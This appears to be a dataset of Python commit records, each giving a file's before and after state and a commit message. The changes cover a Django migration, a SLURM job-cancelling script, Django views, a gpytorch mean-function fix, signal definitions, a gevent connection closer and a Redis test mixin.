class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
Drop content type in migration as well# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
<commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
]
<commit_msg>Drop content type in migration as well<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
def forwards_remove_content_types(apps, schema_editor):
db = schema_editor.connection.alias
ContentType = apps.get_model('contenttypes', 'ContentType')
ContentType.objects.using(db).filter(
app_label='oauth',
model__in=['githubproject', 'githuborganization',
'bitbucketproject', 'bitbucketteam']
).delete()
class Migration(migrations.Migration):
dependencies = [
('oauth', '0003_move_github'),
]
operations = [
migrations.RemoveField(
model_name='bitbucketproject',
name='organization',
),
migrations.RemoveField(
model_name='bitbucketproject',
name='users',
),
migrations.RemoveField(
model_name='bitbucketteam',
name='users',
),
migrations.RemoveField(
model_name='githuborganization',
name='users',
),
migrations.RemoveField(
model_name='githubproject',
name='organization',
),
migrations.RemoveField(
model_name='githubproject',
name='users',
),
migrations.DeleteModel(
name='BitbucketProject',
),
migrations.DeleteModel(
name='BitbucketTeam',
),
migrations.DeleteModel(
name='GithubOrganization',
),
migrations.DeleteModel(
name='GithubProject',
),
migrations.RunPython(forwards_remove_content_types),
]
|
056b4ae938ab1aacf5e3f48a1e17919a79ff29b7
|
scripts/sbatch_cancel.py
|
scripts/sbatch_cancel.py
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(target_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
Kill multiple chains at once.
|
Kill multiple chains at once.
|
Python
|
mit
|
nyu-mll/spinn,nyu-mll/spinn,nyu-mll/spinn
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
Kill multiple chains at once.
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(target_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
<commit_before>import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
<commit_msg>Kill multiple chains at once.<commit_after>
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(target_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
Kill multiple chains at once.import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(target_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
<commit_before>import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
<commit_msg>Kill multiple chains at once.<commit_after>import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(target_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
994ef988e966499dbc5c7298a201105517692fc7
|
source/views/views.py
|
source/views/views.py
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
Add extra line to separate functions
|
Add extra line to separate functions
|
Python
|
mit
|
jeremyrea/caterblu,jeremyrea/caterblu,jeremyrea/caterblu,jeremyrea/caterblu
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
Add extra line to separate functions
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
<commit_before>import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
<commit_msg>Add extra line to separate functions<commit_after>
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
Add extra line to separate functionsimport json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
<commit_before>import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
<commit_msg>Add extra line to separate functions<commit_after>import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
cef6f3cce4a942bea53d6bae639dcd48d680d05a
|
gpytorch/means/linear_mean.py
|
gpytorch/means/linear_mean.py
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
Fix LinearMean bias when bias=False
|
Fix LinearMean bias when bias=False
|
Python
|
mit
|
jrg365/gpytorch,jrg365/gpytorch,jrg365/gpytorch
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
Fix LinearMean bias when bias=False
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
<commit_before>#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
<commit_msg>Fix LinearMean bias when bias=False<commit_after>
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
Fix LinearMean bias when bias=False#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
<commit_before>#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
<commit_msg>Fix LinearMean bias when bias=False<commit_after>#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
f00fd0fde81a340cf00030bbe2562b8c878edd41
|
src/yawf/signals.py
|
src/yawf/signals.py
|
from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
|
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
Add new arg in message_handled signal definition
|
Add new arg in message_handled signal definition
|
Python
|
mit
|
freevoid/yawf
|
from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
Add new arg in message_handled signal definition
|
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
<commit_before>from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
<commit_msg>Add new arg in message_handled signal definition<commit_after>
|
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
Add new arg in message_handled signal definitionfrom django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
<commit_before>from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
<commit_msg>Add new arg in message_handled signal definition<commit_after>from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
e1529a2071779dc7f657c3bbb370f3c2c5fb240e
|
HTTPCloser.py
|
HTTPCloser.py
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
Fix typoe items vs items()
|
Fix typoe items vs items()
|
Python
|
mit
|
c00w/bitHopper,c00w/bitHopper
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
Fix typoe items vs items()
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
<commit_before>import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
<commit_msg>Fix typoe items vs items()<commit_after>
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
Fix typoe items vs items()import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
<commit_before>import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
<commit_msg>Fix typoe items vs items()<commit_after>import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
5a76457e2b9596ad3497b0145410a2f4090a5c54
|
tests/mixins.py
|
tests/mixins.py
|
class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
Add annotation required for mypy
|
Add annotation required for mypy
|
Python
|
bsd-3-clause
|
thread/django-lightweight-queue,thread/django-lightweight-queue
|
class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
Add annotation required for mypy
|
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
